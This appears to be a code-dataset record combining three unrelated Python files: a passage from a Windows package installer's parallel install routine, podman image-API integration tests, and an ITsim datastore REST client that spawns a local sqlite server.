        # Match each packet to its downloaded file by display name.
        for pack in packets:
            for path in paths.items():
                if pack.display_name == path[1]['display_name']:
                    install_items.append(Install(
                        pack.display_name, path[1]['path'], pack.install_switches, pack.win64_type, pack.directory, pack.custom_location, self.metadata))
    else:
        # BUG FIX: the single-packet branch passed the display name where the
        # installer path belongs (paths[0][1]['display_name']) and misspelled
        # `install_switches` as `install_switche` (AttributeError). It also
        # returned a bare Install while the multi-packet branch returns the
        # [exe, msi, other] split that handle_multi_install() iterates, so the
        # single-packet result is now routed through generate_split() too.
        entry = next(iter(paths.values()))
        install_items.append(Install(
            packets[0].display_name, entry['path'], packets[0].install_switches, packets[0].win64_type, packets[0].directory, packets[0].custom_location, self.metadata))
    return self.generate_split(install_items)
def generate_split(self, install_items) -> list:
    """Partition installers by download type.

    Returns a three-element list: [.exe installers, .msi installers,
    everything else], preserving input order within each bucket.
    """
    grouped = {'.exe': [], '.msi': [], 'other': []}
    for entry in install_items:
        kind = entry.download_type if entry.download_type in ('.exe', '.msi') else 'other'
        grouped[kind].append(entry)
    return [grouped['.exe'], grouped['.msi'], grouped['other']]
def handle_multi_install(self, paths):
    """Run the installers for the files downloaded into `paths`.

    `install_items` comes back from generate_installers() as
    [exe_list, msi_list, other_list]; each sub-list is processed in turn,
    then the temp files are optionally cleaned up and environment
    variables refreshed.

    NOTE(review): the `is_msi` probing and the double dispatch below
    (a sequential install_package() pass followed by Process-based
    installs over the same list) look suspicious — presumably .msi
    installers must run sequentially (msiexec holds a global lock) while
    .exe installers may run in parallel; confirm intent.
    """
    write_debug('Initialising Rapid Install Procedure...', self.metadata)
    processes = []
    install_items = self.generate_installers(paths)
    idx = 0
    for item in install_items:
        # Probe whether this bucket has more than one element; both probes
        # only set a flag, the indexing result itself is discarded.
        is_msi = False
        try:
            item[1]
            is_msi = True
        except IndexError:
            is_msi = False
        try:
            item[idx]
            is_msi = True
        except IndexError:
            is_msi = False
        if is_msi:
            # Sequential installation pass for this bucket.
            if item[idx] == item[1]:
                for val in item:
                    self.install_package(val)
        if item:
            # Parallel installation pass: one process per installer.
            for val in item:
                write_debug(f'Running Installer For <{val.display_name}> On Thread {item.index(val)}', self.metadata)
                processes.append(
                    Process(target=self.install_package, args=(val,)))
            for process in processes:
                process.start()
            for x in processes:
                x.join()
            processes.clear()
        idx += 1
    if self.metadata.reduce_package:
        # Remove the downloaded setup files from the temp directory.
        for path in paths:
            os.remove(path)
        write('Successfully Cleaned Up Installer From Temp Directory...',
              'green', self.metadata)
    write(
        'Successfully Installed Packages!', 'bright_magenta', self.metadata)
    log_info('Successfully Installed Packages!', self.metadata.logfile)
    log_info('Refreshing Environment Variables', self.metadata.logfile)
    write_debug(
        'Refreshing Env Variables, Calling Batch Script', self.metadata)
    write_verbose('Refreshing Environment Variables', self.metadata)
    start = timer()
    refresh_environment_variables()
    end = timer()
    write_debug(f'Successfully Refreshed Environment Variabled in {round((end - start), 2)} seconds', self.metadata)
    write_verbose('Installation and setup completed.', self.metadata)
    log_info('Installation and setup completed.', self.metadata.logfile)
    write_debug(
        f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata)
    log_info(
        f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata.logfile)
    if self.metadata.logfile:
        closeLog(self.metadata.logfile, 'Install')
|
test_v2_0_0_image.py | import json
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from .fixtures import APITestCase
class ImageTestCase(APITestCase):
    """Integration tests for podman's image endpoints (docker v1.40
    compatibility API plus the libpod-native routes)."""

    @staticmethod
    def _pull_report_keys(text):
        """Parse a streamed pull response (one JSON object per line) and
        return which stanza keys were seen at least once.

        Extracted because test_pull previously duplicated this block
        verbatim for the normal and quiet pulls.
        """
        keys = {
            "error": False,
            "id": False,
            "images": False,
            "stream": False,
        }
        # Read and record stanza's from pull
        for line in str.splitlines(text):
            obj = json.loads(line)
            for k in list(obj.keys()):
                keys[k] = True
        return keys

    def test_list(self):
        """GET /images/json returns a list of dicts carrying the compat keys."""
        r = requests.get(self.podman_url + "/v1.40/images/json")
        self.assertEqual(r.status_code, 200, r.text)

        # See https://docs.docker.com/engine/api/v1.40/#operation/ImageList
        required_keys = (
            "Id",
            "ParentId",
            "RepoTags",
            "RepoDigests",
            "Created",
            "Size",
            "SharedSize",
            "VirtualSize",
            "Labels",
            "Containers",
        )

        images = r.json()
        self.assertIsInstance(images, list)
        for item in images:
            self.assertIsInstance(item, dict)
            for k in required_keys:
                self.assertIn(k, item)

    def test_inspect(self):
        """GET /images/alpine/json returns a dict with the compat keys and a
        parseable Created timestamp."""
        r = requests.get(self.podman_url + "/v1.40/images/alpine/json")
        self.assertEqual(r.status_code, 200, r.text)

        # See https://docs.docker.com/engine/api/v1.40/#operation/ImageInspect
        required_keys = (
            "Id",
            "Parent",
            "Comment",
            "Created",
            "Container",
            "DockerVersion",
            "Author",
            "Architecture",
            "Os",
            "Size",
            "VirtualSize",
            "GraphDriver",
            "RootFS",
            "Metadata",
        )

        image = r.json()
        self.assertIsInstance(image, dict)
        for item in required_keys:
            self.assertIn(item, image)
        # Created must be an RFC3339-ish timestamp dateutil can parse.
        _ = parse(image["Created"])

    def test_delete(self):
        """Force-deleting an image returns a JSON list of affected items."""
        r = requests.delete(self.podman_url + "/v1.40/images/alpine?force=true")
        self.assertEqual(r.status_code, 200, r.text)
        self.assertIsInstance(r.json(), list)

    def test_pull(self):
        """Pull with and without quiet=true; quiet must suppress the
        stream-progress stanzas."""
        r = requests.post(self.uri("/images/pull?reference=alpine"), timeout=15)
        self.assertEqual(r.status_code, 200, r.status_code)
        keys = self._pull_report_keys(r.text)
        self.assertFalse(keys["error"], "Expected no errors")
        self.assertTrue(keys["id"], "Expected to find id stanza")
        self.assertTrue(keys["images"], "Expected to find images stanza")
        self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")

        r = requests.post(self.uri("/images/pull?reference=alpine&quiet=true"), timeout=15)
        self.assertEqual(r.status_code, 200, r.status_code)
        keys = self._pull_report_keys(r.text)
        self.assertFalse(keys["error"], "Expected no errors")
        self.assertTrue(keys["id"], "Expected to find id stanza")
        self.assertTrue(keys["images"], "Expected to find images stanza")
        # BUG FIX: this failure message was copied from the non-quiet case;
        # on an assertFalse it must state that no stream stanzas are expected.
        self.assertFalse(keys["stream"], "Expected no stream progress stanza's")

    def test_create(self):
        """Create from a registry image and from '-' (empty source)."""
        r = requests.post(
            self.podman_url + "/v1.40/images/create?fromImage=alpine&platform=linux/amd64/v8",
            timeout=15,
        )
        self.assertEqual(r.status_code, 200, r.text)

        r = requests.post(
            self.podman_url
            + "/v1.40/images/create?fromSrc=-&repo=fedora&message=testing123&platform=linux/amd64",
            timeout=15,
        )
        self.assertEqual(r.status_code, 200, r.text)

    def test_search_compat(self):
        """Compat /images/search variants, each run in its own process so a
        hung registry cannot hang the suite."""
        url = self.podman_url + "/v1.40/images/search"

        # Had issues with this test hanging when repositories not happy
        def do_search1():
            payload = {"term": "alpine"}
            r = requests.get(url, params=payload, timeout=5)
            self.assertEqual(r.status_code, 200, f"#1: {r.text}")
            self.assertIsInstance(r.json(), list)

        def do_search2():
            payload = {"term": "alpine", "limit": 1}
            r = requests.get(url, params=payload, timeout=5)
            self.assertEqual(r.status_code, 200, f"#2: {r.text}")
            results = r.json()
            self.assertIsInstance(results, list)
            self.assertEqual(len(results), 1)

        def do_search3():
            # FIXME: Research if quay.io supports is-official and which image is "official"
            return
            payload = {"term": "thanos", "filters": '{"is-official":["true"]}'}
            r = requests.get(url, params=payload, timeout=5)
            self.assertEqual(r.status_code, 200, f"#3: {r.text}")
            results = r.json()
            self.assertIsInstance(results, list)
            # There should be only one official image
            self.assertEqual(len(results), 1)

        def do_search4():
            headers = {"X-Registry-Auth": "null"}
            payload = {"term": "alpine"}
            r = requests.get(url, params=payload, headers=headers, timeout=5)
            self.assertEqual(r.status_code, 200, f"#4: {r.text}")

        def do_search5():
            headers = {"X-Registry-Auth": "invalid value"}
            payload = {"term": "alpine"}
            r = requests.get(url, params=payload, headers=headers, timeout=5)
            self.assertEqual(r.status_code, 400, f"#5: {r.text}")

        # BUG FIX: `i` was initialised to 1 but never incremented, so every
        # subTest and timeout message reported "#1". Enumerate instead.
        for i, fn in enumerate(
            [do_search1, do_search2, do_search3, do_search4, do_search5], start=1
        ):
            with self.subTest(i=i):
                search = Process(target=fn)
                search.start()
                search.join(timeout=10)
                self.assertFalse(search.is_alive(), f"#{i} /images/search took too long")

    def test_history(self):
        """GET /images/alpine/history returns a list of layer dicts."""
        r = requests.get(self.podman_url + "/v1.40/images/alpine/history")
        self.assertEqual(r.status_code, 200, r.text)

        # See https://docs.docker.com/engine/api/v1.40/#operation/ImageHistory
        required_keys = ("Id", "Created", "CreatedBy", "Tags", "Size", "Comment")

        changes = r.json()
        self.assertIsInstance(changes, list)
        for change in changes:
            self.assertIsInstance(change, dict)
            for k in required_keys:
                self.assertIn(k, change)

    def test_tree(self):
        """Libpod-native tree endpoint renders a textual layer tree."""
        r = requests.get(self.uri("/images/alpine/tree"))
        self.assertEqual(r.status_code, 200, r.text)
        tree = r.json()
        self.assertTrue(tree["Tree"].startswith("Image ID:"), r.text)
if __name__ == "__main__":
unittest.main()
|
datastore.py | from abc import abstractmethod
import requests
import json
import os
import logging
from logging import Logger
from collections import namedtuple
from typing import Any, Optional
from queue import Queue
from threading import Thread, Timer
from itsim.datastore.datastore_server import DatastoreRestServer
from itsim.logging import create_logger
from uuid import uuid4, UUID
import tempfile
class DatastoreClient:
    """
    Base class for datastore client implementation
    """

    def __init__(self, **kwargs):
        # Subclasses decide which keyword options they accept.
        pass

    @abstractmethod
    def load_item(self, item_type: str, uuid: UUID, from_time: Optional[str] = None, to_time: Optional[str] = None) -> str:
        """Fetch the item of `item_type` identified by `uuid`, optionally
        restricted to the [from_time, to_time] window."""
        pass

    @abstractmethod
    def store_item(self, data: Any, overwrite: bool = True) -> None:
        """Persist `data`; `overwrite` controls replacement of an
        existing item."""
        pass

    @abstractmethod
    def delete(self, item_type: str, uuid: UUID):
        """Remove the item of `item_type` identified by `uuid`."""
        pass
class DatastoreRestClient(DatastoreClient):
    """REST client for the ITsim datastore.

    If no server answers at the target URL, a local DatastoreRestServer
    backed by a temporary sqlite file is spawned on a background thread
    and shut down again when this client is garbage-collected.
    """

    def __init__(self, hostname: str = '0.0.0.0', port: int = 5000, sim_uuid: Optional[UUID] = None) -> None:
        # BUG FIX: the original default was `sim_uuid: UUID = uuid4()`.
        # Default values are evaluated once at definition time, so every
        # client constructed without an explicit sim_uuid shared the SAME
        # uuid. A None sentinel yields a fresh uuid per instance.
        self._sim_uuid = sim_uuid if sim_uuid is not None else uuid4()
        self._headers = {'Accept': 'application/json'}
        self._url = f'http://{hostname}:{port}/'
        self._started_server = False

        if not self.server_is_alive():
            # No reachable server: start a private one on a temp database.
            _, self._db_file = tempfile.mkstemp(suffix=".sqlite")
            port = self.launch_server_thread(hostname)
            self._started_server = True
            self._url = f'http://{hostname}:{port}/'
            print(f"Couldn't find server, launching a local instance: {self._url}")

    def __del__(self) -> None:
        """
        Shuts down the datastore server if it was created by constructor
        """
        timeout_thr_join = 5.0
        if self._started_server:
            # NOTE(review): exceptions raised in __del__ are only reported
            # as warnings by the interpreter; behaviour kept as-is.
            response = requests.post(f'{self._url}stop')
            if response.status_code != 200:
                raise RuntimeError("Error shutting down the Datastore Server.")
            self._thr.join(timeout=timeout_thr_join)
            if os.path.isfile(self._db_file):
                os.remove(self._db_file)

    def server_is_alive(self) -> bool:
        """Return True when a datastore server answers the isrunning probe."""
        try:
            is_alive_url = f'{self._url}isrunning/{self._sim_uuid}'
            print(is_alive_url)
            page = requests.get(is_alive_url)
            return page.status_code == 200
        except Exception:
            return False

    def launch_server_thread(self, hostname) -> int:
        """Start a DatastoreRestServer on a background thread.

        Ports are probed from 5000 upward; returns the bound port, or
        raises RuntimeError when none could be bound.
        """
        def start_and_run_server(server, hostname, queue_port):
            for port in range(5000, 2 ** 16 - 1):
                timer = None
                try:
                    # If run() is still blocking after 50 ms, assume the bind
                    # succeeded and report this port back to the caller.
                    timer = Timer(0.05, lambda: queue_port.put(port))
                    timer.start()
                    server.run(host=hostname, port=port, debug=False)
                    return
                except OSError as err:
                    if err.errno == 97:  # Port already in use.
                        if timer is not None:
                            timer.cancel()
            # At this point, we were unable to find a suitable port -- fail.
            queue_port.put(0)

        server = DatastoreRestServer(type="sqlite", sqlite_file=self._db_file)
        queue_port: Queue = Queue()
        self._thr = Thread(target=start_and_run_server, args=(server, hostname, queue_port))
        self._thr.start()
        port = queue_port.get()
        if port == 0:
            raise RuntimeError('Unable to start the datastore server')
        return port

    # Creating the logger for console and datastore output
    def create_logger(self,
                      logger_name: str = __name__,
                      console_level=logging.DEBUG,
                      datastore_level=logging.DEBUG) -> Logger:
        return create_logger(logger_name,
                             self._sim_uuid,
                             self._url,
                             console_level,
                             datastore_level)

    def load_item(self, item_type: str, uuid: UUID, from_time: Optional[str] = None,
                  to_time: Optional[str] = None) -> str:
        """
        Requests GET
        """
        response = requests.get(f'{self._url}{item_type}/{str(uuid)}',
                                headers=self._headers,
                                json={'from_time': from_time, 'to_time': to_time})
        # BUG FIX: the original tested `not in range(200, 299)` (excludes
        # status 299) and had an unreachable `return ''` after the raise.
        if not 200 <= response.status_code < 300:
            raise RuntimeError("Error raised while loading data from server")
        return json.loads(json.loads(response.content),
                          object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))

    def store_item(self, data: Any, overwrite: Optional[bool] = True) -> None:
        """
        Requests POST
        """
        response = requests.post(f'{self._url}{data.type}/{data.uuid}',
                                 headers=self._headers,
                                 json=data)
        # BUG FIX: same off-by-one as load_item (range(200, 299) excludes 299).
        if not 200 <= response.status_code < 300:
            raise RuntimeError("Error raised while storing data on server")

    def delete(self, item_type: str, uuid: UUID) -> None:
        """Not implemented for the REST transport yet."""
        pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.